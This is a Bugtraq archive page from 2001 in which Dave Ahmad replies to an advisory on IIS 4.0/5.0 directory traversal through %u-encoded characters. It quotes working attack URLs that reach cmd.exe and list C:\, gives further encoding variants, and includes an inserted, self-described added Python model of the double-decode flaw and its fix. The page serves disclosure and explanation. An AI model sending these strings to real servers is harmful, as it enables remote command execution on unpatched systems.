Bugtraq mailing list archives
Re: New vulnerability in IIS4.0/5.0
From: Dave Ahmad <da () securityfocus com>
Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
This seems to just be another way to exploit the double decode vulnerability (Bugtraq ID 2708). There is a possibility that it may be a new issue due to the use of the '%u' method of encoding. It does not look that way to us. On our test machines (and at eEye), systems do not seem to be vulnerable after applying the MS01-026 hotfix (or the MS01-044 patch).

Ryan Permeh of eEye Digital Security provided a breakdown of an encoded attack string:

The attack string used successfully against an IIS server (Win2K, SP2):

http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c+dir+c:\

first decode sequence (it replaces %u0025 with %)

http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

second decode sequence (it replaces %u005c with /)

http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

The double decode vulnerability is fixed in MS01-026. I believe the fix is included in the cumulative patch released with MS01-044. It doesn't look like a new vulnerability, but we are awaiting confirmation from Microsoft.

Has anyone managed to exploit a patched system?

Thanks Ryan & eEye.

Regards,
Dave Ahmad
Security Focus
www.securityfocus.com

On Wed, 19 Sep 2001, ALife // BERG wrote:
-----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
Remote users can execute any command on several IIS 4.0 and 5.0 systems by using UTF codes
-------------------------------------[ security.instock.ru ]--------------

Topic: Remote users can execute any command on several IIS 4.0 and 5.0 systems by using UTF codes
Announced: 2001-09-19
Credits: ALife <buginfo () inbox ru>
Affects: Microsoft IIS 4.0/5.0
--------------------------------------------------------------------------

---[ Description

For example, the target has a virtual executable directory (e.g. "scripts") that is located on the same drive as the Windows system. Submit a request like this:

http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

The directory listing of C:\ will be revealed. Of course, the same effect can be achieved by applying this kind of processing to '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c", "..%u0025%u005c" ...

Note: The attacker can run commands with IUSR_machinename account privileges only.
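The two-step decode breakdown above is easy to model. The following is an added example, not code from the thread, from eEye or from IIS: it assumes a simplified server flow in which the path is percent-decoded once (handling both %XX and the Microsoft-specific %uXXXX form), the ".." check runs on that result, and the path is decoded a second time before it is used on disk. That structure reproduces the breakdown of the %u0025u005c string and the "..%u00255c" variant from the advisory; it is not a description of IIS internals or of what the MS01-026 hotfix changed, and the "fixed" flow is simply the hardening principle (check the exact string you will use, never decode it again afterwards).

```python
"""Model of a decode / check / decode-again request flow (added example).

The two-pass structure, the traversal check and the 'fixed' flow are
assumptions that reproduce the breakdown posted in the thread; none of this
is IIS code or a description of the MS01-026 fix.
"""

HEX = set("0123456789abcdefABCDEF")


def decode_once(s: str) -> str:
    """Single left-to-right decode pass over a URL path.

    Handles %XX and the IIS-specific %uXXXX form (a UTF-16 code unit).
    Characters produced by a decode are NOT rescanned, which is why
    '%u0025u005c' yields the literal text '%u005c' after one pass and
    only becomes a backslash on a second pass.
    """
    out = []
    i, n = 0, len(s)
    while i < n:
        if s[i] == "%":
            # %uXXXX: 'u' plus four hex digits
            if i + 6 <= n and s[i + 1] in "uU" and all(c in HEX for c in s[i + 2:i + 6]):
                out.append(chr(int(s[i + 2:i + 6], 16)))
                i += 6
                continue
            # %XX: two hex digits
            if i + 3 <= n and all(c in HEX for c in s[i + 1:i + 3]):
                out.append(chr(int(s[i + 1:i + 3], 16)))
                i += 3
                continue
        out.append(s[i])  # stray '%' or an ordinary character
        i += 1
    return "".join(out)


def contains_traversal(path: str) -> bool:
    """True if any path segment is '..'; both separators count on Windows."""
    return any(seg == ".." for seg in path.replace("\\", "/").split("/"))


def path_part(url: str) -> str:
    """Strip the query string; only the path is decoded for the file lookup."""
    return url.split("?", 1)[0]


def vulnerable_flow(url: str) -> tuple[str, str]:
    """The bug: check after the first decode, then decode again before use."""
    first = decode_once(path_part(url))
    if contains_traversal(first):
        return "rejected", first
    return "served", decode_once(first)


def fixed_flow(url: str) -> tuple[str, str]:
    """Decode once and check the exact string that will be used on disk."""
    decoded = decode_once(path_part(url))
    if contains_traversal(decoded):
        return "rejected", decoded
    return "served", decoded


# Constructed request paths, taken from the strings quoted in the thread.
ATTACK = "/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c+dir+c:\\"
ATTACK_25 = "/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\\"
SINGLE = "/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\\"

if __name__ == "__main__":
    for url in (ATTACK, ATTACK_25, SINGLE):
        for flow in (vulnerable_flow, fixed_flow):
            verdict, path = flow(url)
            print(f"{flow.__name__:16} {verdict:8} {path}")
```

Under this model the single-encoded "..%u005c" form is caught by the check after the first pass, while the double-encoded forms slip through it and only turn into "..\..\" on the second decode; the thread does not say why the single-encoded form also worked on the poster's unpatched server, so the model makes no claim about that.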
Current thread:
- New vulnerability in IIS4.0/5.0 ALife // BERG (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 Dave Ahmad (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
- ICQ WEB Portal multiple Cross Site Scripting vulnerability acz [iSecureLabs] (Sep 20)
- Re: New vulnerability in IIS4.0/5.0 Paul McGovern (Sep 21)
- Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
- Re: New vulnerability in IIS4.0/5.0 César González (Sep 19)
- <Possible follow-ups>
- RE: New vulnerability in IIS4.0/5.0 Microsoft Security Response Center (Sep 20)
- Re: New vulnerability in IIS4.0/5.0 Dave Ahmad (Sep 19)